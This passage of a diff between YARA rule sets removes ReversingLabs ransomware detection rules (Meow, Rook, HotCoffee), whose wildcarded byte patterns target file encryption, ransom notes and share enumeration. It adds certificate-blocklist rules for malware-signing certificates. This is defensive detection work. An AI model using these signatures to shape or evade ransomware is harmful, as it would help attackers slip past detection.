-            ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF D7 6A ?? 8D 45 ?? 50 8B 45 ?? FF B0 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8B 45 ?? FF B0 ?? ?? ?? ?? 53 FF D7 53 FF 15 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 6A ?? 50 FF 75 ?? FF
-            15
-        }
-		$remote_connection = {
-            FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 83 79 ?? ?? 72 ??
-            8B 09 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 51 57 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85
-            F6 0F 84 ?? ?? ?? ?? 8B 4D ?? 53 83 79 ?? ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? BB ?? ?? ?? ?? EB ?? 51 8D 45 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BB
-            ?? ?? ?? ?? 6A ?? 6A ?? FF 75 ?? 8B C8 6A ?? E8 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ??
-            ?? 66 89 4D ?? 8D 4D ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8D 4D
-            ?? 83 E3 ?? E8 ?? ?? ?? ?? F6 C3 ?? 5B 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D
-            4D ?? 6A ?? 68 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 0F
-            43 45 ?? 50 68 ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F
-            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 3D ?? ??
-            ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 74 ?? 8B 45 ??
-            85 C0 74 ?? C6 84 05 ?? ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ??
-            ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D7 85 C0 75 ?? 8B 7D
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45
-            ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D
-            ?? ?? 8D 4D ?? 8B 45 ?? 8D 55 ?? 0F 43 4D ?? 8B 75 ?? 03 C1 83 7D ?? ?? 8D 4D ?? 52
-            0F 43 4D ?? 50 51 8B CE E8 ?? ?? ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8D 4D
-            ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" and 1602201600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "6bb83f26-90f5-587f-8c69-fa06beaead3e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12102-L12120"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fbbea89f2070b2a527bba6199022fbffd269e664b000988a59adf4ca0d4a9f22"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANGA GIP d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" or pe.signatures [ i ] . serial == "aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" ) and 1615766400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Meow : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Meow ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7cebb04d-1cda-5ad1-b412-8b38df7b2550"
-		date = "2022-10-24"
-		modified = "2022-10-24"
+		id = "c47bb4f0-d60b-5948-ac10-6083606ed46a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Meow.yara#L1-L84"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b00753d2b150a815279297ddf40d70051d25de1c32bb90f5b706ea7fd36bb871"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12122-L12138"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3573d1d5f11df106f1f6f44f8b0164992f2a50707c6df7b08b05ed9ea7d9173b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Meow"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            72 ?? 8D 45 ?? BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 33 F6 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B4 B5 ?? ?? ?? ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C
-            ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 5F 5E 33 C0 5B 8B E5 5D C3 CC 55 8B EC 83 EC
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ??
-            75
-        }
-		$encrypt_files_p2 = {
-            8B 45 ?? 40 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74 ?? E9 ?? ?? ?? ?? 8B 45 ?? 25 ?? ??
-            ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 74 ?? 8B 4D ?? 8D 46 ?? 03 CF 0F AF C8 89 4D ?? 8B
-            45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 75 ?? B9 ?? ?? ?? ?? 90 8B 45 ?? 99
-            F7 F9 8B 45 ?? 85 D2 74 ?? 48 EB ?? 40 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83
-            C8 ?? 83 C0 ?? 74 ?? EB ?? 8B 45 ?? B9 ?? ?? ?? ?? 99 F7 F9 85 D2 74 ?? 8B 45 ?? 8D
-            4E ?? 83 C0 ?? 99 F7 F9 B9 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 75 ?? 8B 45
-            ?? 99 F7 7D ?? 8B 45 ?? 85 D2 74 ?? 40 EB ?? 48 89 45 ?? 8B 45 ?? 99 F7 F9 85 D2 74
-            ?? 6A ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 FF
-            D0 C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 45 ?? 99 F7 F9 8B 45 ?? 85 D2 74 ?? 83 C0
-            ?? 03 C3 89 45 ?? 8B 45 ?? 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 83 C0 ?? 0F 85
-        }
-		$drop_ransom_note = {
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 53 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
-            FF 74 ?? 8B CF E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 6A
-            ?? 68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D0 6A ??
-            68 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 8B F0 BA ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 89 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 56 FF D0 B9 ?? ?? ?? ?? 8D BD ??
-            ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ?? 6A ?? 50 66 A5 A4 E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 CD B8 ??
-            ?? ?? ?? 5F 5B 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files = {
-            53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF
-            B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89
-            9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9
-            ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ??
-            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? 74 ??
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" and 1641833688 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "500c9604-cc07-52b1-8c46-09894d132205"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12140-L12156"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "47735267e9a0fb8107f6c4008bacc8aada1705f6714a0447dacc3928fc20cad6"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StackUp ApS" and pe.signatures [ i ] . serial == "04:00:c7:61:4f:86:d7:5f:e4:ee:3f:61:92:b6:fe:da" and 1626393601 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Rook : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Rook ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "60bbfd57-18bb-58b3-9abc-ab30943bbddd"
-		date = "2022-01-17"
-		modified = "2022-01-17"
+		id = "2e799dd9-d143-55a7-9d07-d5f289477b24"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.Rook.yara#L1-L122"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "dc8b37e55b634de52855dd851dbaaf3e690adfb2e875d0e0c9ef5f4846c6ff30"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12158-L12176"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "425126b90fe2ab7c1ec7bf2fd5a91e4438a81992f20f99ed87ec62e7f20043cd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Rook"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            48 2B D6 48 8D 4C 24 ?? 48 FF C2 41 B8 ?? ?? ?? ?? F6 D8 4D 1B FF 4C 23 FA 33 D2 E8
-            ?? ?? ?? ?? 45 33 C9 89 7C 24 ?? 4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CE FF 15
-            ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CE E8 ?? ?? ??
-            ?? 8B F8 48 83 FB ?? 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ??
-            48 33 CC E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F
-            5E 5D C3 49 8B 6E ?? 49 2B 2E 48 C1 FD ?? 80 7C 24 ?? ?? 75 ?? 8A 44 24 ?? 84 C0 74
-            ?? 3C ?? 75 ?? 40 38 7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D6 E8 ??
-            ?? ?? ?? 85 C0 75 ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06
-            49 8B 56 ?? 48 2B D0 48 C1 FA ?? 48 3B EA 0F 84 ?? ?? ?? ?? 48 2B D5 48 8D 0C E8 4C
-            8D 0D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_files_p1 = {
-            40 55 53 56 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? 0F
-            B6 05 ?? ?? ?? ?? F2 0F 11 44 24 ?? 88 44 24 ?? E8 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ??
-            ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 83 CE ?? 48 8D 4C 24 ?? 89 35 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24
-            ?? FF 15 ?? ?? ?? ?? 48 63 C8 4C 8D 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? ?? 0F 57 C0
-            0F 57 C9 F3 0F 7F 05 ?? ?? ?? ?? F3 0F 7F 0D ?? ?? ?? ?? F3 0F 7F 05 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 85 C0 48 89 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 0F 44 0D ?? ?? ??
-            ?? 48 89 0D ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C0 48 8D 15 ?? ??
-            ?? ?? 4C 63 C0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 89 05 ?? ?? ?? ?? 33 DB 48 8B 05 ?? ?? ?? ?? 45 33 C9 48 89 05 ?? ?? ??
-            ?? 45 33 C0 48 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 C7
-        }
-		$encrypt_files_p2 = {
-            C1 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D
-            25 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 45 33 C9 45 33 C0 4C 89 64 24 ?? 4C 89 BC 24
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? 83
-            F8 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 89 5C 24 ??
-            E8 ?? ?? ?? ?? 85 C0 78 ?? 4C 63 C8 4C 8D 85 ?? ?? ?? ?? 48 8D 44 24 ?? 4D 2B C1 48
-            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 64 24 ?? E8 ?? ?? ?? ??
-            49 8B CD FF 15 ?? ?? ?? ?? 44 8B C0 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? 41 F7 E8 C1 FA
-            ?? 8B CA C1 E9 ?? 03 D1 69 CA ?? ?? ?? ?? 44 3B C1 74 ?? FF C2 4C 8D 3D ?? ?? ?? ??
-            85 D2 0F 8E ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 49 8B DD 4C 89 B4 24 ?? ?? ?? ?? 49
-        }
-		$encrypt_files_p3 = {
-            8B FF 44 8B F2 0F 1F 00 48 8B 0D ?? ?? ?? ?? 8B 91 ?? ?? ?? ?? 85 D2 74 ?? 83 FA ??
-            75 ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 7C 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 89
-            5C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C7 ??
-            ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 49 83 EE ?? 75 ?? 4C 8B B4 24 ?? ?? ?? ?? 33 DB 48 8B
-            BC 24 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 FF C6 41 80 3C 34 ?? 75 ?? 48 8B 8D ?? ?? ??
-            ?? 48 8D 15 ?? ?? ?? ?? 89 74 24 ?? 41 B9 ?? ?? ?? ?? 45 33 C0 4C 89 64 24 ?? FF 15
-            ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? 45 33 C0 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? EB ?? 48 8B 8D ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8D 3D ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 45 33
-            C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 49 8B CC FF
-            15 ?? ?? ?? ?? 49 8B D4 48 8D 0D ?? ?? ?? ?? FF C0 4C 63 C0 E8 ?? ?? ?? ?? 48 8B 05
-            ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ??
-            ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B 0D ?? ??
-            ?? ?? FF 50 ?? 48 8B 05 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 33 D2 44 8D 42 ?? FF D0 48
-            8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 63 85 ?? ?? ?? ?? 48 3D ??
-            ?? ?? ?? 73 ?? 0F 1F 00 48 63 85 ?? ?? ?? ?? 42 C6 04 28 ?? FF 85 ?? ?? ?? ?? 48 63
-            85 ?? ?? ?? ?? 48 3D ?? ?? ?? ?? 72 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            5E 5B 5D C3
-        }
-		$enum_procs = {
-            40 56 48 81 EC ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 48 8B C8 48 8B F0 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 89 9C
-            24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 8D 2D ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ??
-            0F 1F 40 ?? 0F 1F 84 00 ?? ?? ?? ?? 33 DB 48 8B FD 66 66 66 0F 1F 84 00 ?? ?? 00 00
-            48 8B 0F 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF C3 48 83 C7 ?? 83 FB ?? 72
-            ?? EB ?? 44 8B 44 24 ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? BA
-            ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48
-            8B CE FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ??
-            48 8B 9C 24 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E C3
-        }
-		$enum_shares = {
-            48 83 EC ?? 33 D2 C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 4C
-            8B C9 48 89 44 24 ?? 8D 4A ?? 44 8D 42 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            48 89 5C 24 ?? 8B 5C 24 ?? 48 89 7C 24 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 0D ??
-            ?? ?? ?? 4C 8D 43 ?? BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 48 8B
-            4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C0 48 8D 54 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 66 0F
-            1F 44 00 ?? 33 DB 39 5C 24 ?? 76 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 8D 0C 5B 48 C1 E1 ??
-            48 03 CF F6 41 ?? ?? 74 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 49 ?? E8 ?? ?? ?? ?? FF C3 3B
-            5C 24 ?? 72 ?? 48 8B 4C 24 ?? 4C 8D 4C 24 ?? 4C 8B C7 48 8D 54 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 48 8B 0D ?? ?? ?? ?? 4C 8B C7 33 D2 FF 15 ?? ?? ?? ?? 48 8B 4C 24 ??
-            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 5C 24 ?? 48 83 C4 ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_shares ) and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERONIKA 2\" OOO" and ( pe.signatures [ i ] . serial == "00:e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" or pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" ) and 1563148800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Hotcoffee : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects HotCoffee ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "11b26b91-96ae-58d3-8a8a-02a3e7d0b82e"
-		date = "2021-11-25"
-		modified = "2021-11-25"
+		id = "4b27c958-58f1-5fbd-8a39-aedfe4dafe39"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win64.Ransomware.HotCoffee.yara#L1-L111"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
